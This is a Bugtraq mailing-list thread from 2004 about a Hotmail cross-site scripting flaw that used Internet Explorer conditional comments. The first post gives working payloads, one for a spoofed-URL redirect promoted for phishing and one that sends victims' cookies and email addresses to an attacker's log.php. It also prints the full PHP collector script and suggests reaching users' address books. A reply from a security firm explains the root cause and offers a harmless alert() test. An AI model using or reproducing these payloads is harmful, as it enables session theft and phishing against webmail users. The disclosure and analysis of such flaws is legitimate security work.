I've looked at this issue with IE, and i've noticed another problem, if i send the line below to a hotmail address the url gets spoofed.
<!--[if IE gte 5]><img src="javascript:window.location='http://www.google.com'"><![endif]-->
That will auto redirect you to www.google.com but look at the address bar, for me it says:
Ok so whats good about a spoofed URL?
Well it's from hotmail, this will make for an EXTREAMLY convincing phishing attack, since it's not hard to view the source of www.hotmail.com use the find command and search for form, and well everyone can figure out what to do from there.
Also it's possible to steal the users cookies using the following line:
<!--[if IE gte 5]><img src="javascript:window.location='http://www.yoursite.com/log.php?email=victimsaddress@xxxxxxxxxxx&cookie=' + document.cookie"><![endif]-->
Remember to type by hand the victims email address otherwise you won't know who's it is.
Content of log.php
<?php $file="youpasswordlog.log"; if (isset($HTTP_GET_VARS["cookie"]) && isset($HTTP_GET_VARS["email"]){
$logcookie = $HTTP_GET_VARS["cookie"];
$logcookie = rawurldecode($logcookie); //turns url encoding to normal text
$logemail = $HTTP_GET_VARS["email"];
$logemail = rawurldecode($logemail); //turns url encoding to normal text
$handle=fopen($file, "r+"); //Opening the file in read only $filecontence=fread($handle,filesize("$file")); fclose($handle);
$handle=fopen($file, "w"); //Opening the file for writing fwrite($handle, "$logemail - $logcookie\n $filecontence\n "); //Writing email address and cookie then the rest of the log fclose($handle); } header("Location: http://www.hotmail.com"); ?>
End of log.php
And of course you can add other stuff to log.php like an IP stealing function.
Also i think the possibilities are endless with this, since i think it's possible to use iframes and other javascript to split the document.location and get to the compose new message window and then load in addresses from the address book, but <script language="JavaScript"> Tags like this still appear to be filtered but i think a number of img tags with javascript in them will continue to be run, not sure yet.
Thanks Andiroo
From: "GreyMagic Security" <security@xxxxxxxxxxxxx>
To: "Paul" <paul@xxxxxxxxxxxxxxxx>, <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: Re: Hotmail Cross Site Scripting Vulnerability
Date: Sat, 17 Jul 2004 18:33:10 +0200
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>Hotmail Cross Site Scripting Vulnerability
>Well, Hotmail was just nice enough to be a little lenient on what >goes in-between those 'if' tags. I suppose that's so MS Word can >send stuff through email to Hotmail customers without it getting >messed up.
The problem is not "if" tags, the problem is the syntax in which they are represented in the document (HTML Comments). Hotmail doesn't check anything between HTML comments because it assumes they won't be processed by the browser, not because it tries to leave backdoors for MSO docs. Hotmail's assumption that HTML comments are safe collides with the well-documented concept of "conditional comments" by the very same company.
See http://msdn.microsoft.com/workshop/author/dhtml/overview/ccomment_ovw.asp for more information.
Btw, this will work just fine without any need for MSO trickery:
<!--[if IE gte 5]> <img src="javascript:alert()"> <![endif]-->
Simply checks if IE's major version is equal or greater than 5 and executes the content if true (older versions don't have the conditional comments feature, but they're irrelevant market-share wise anyway).
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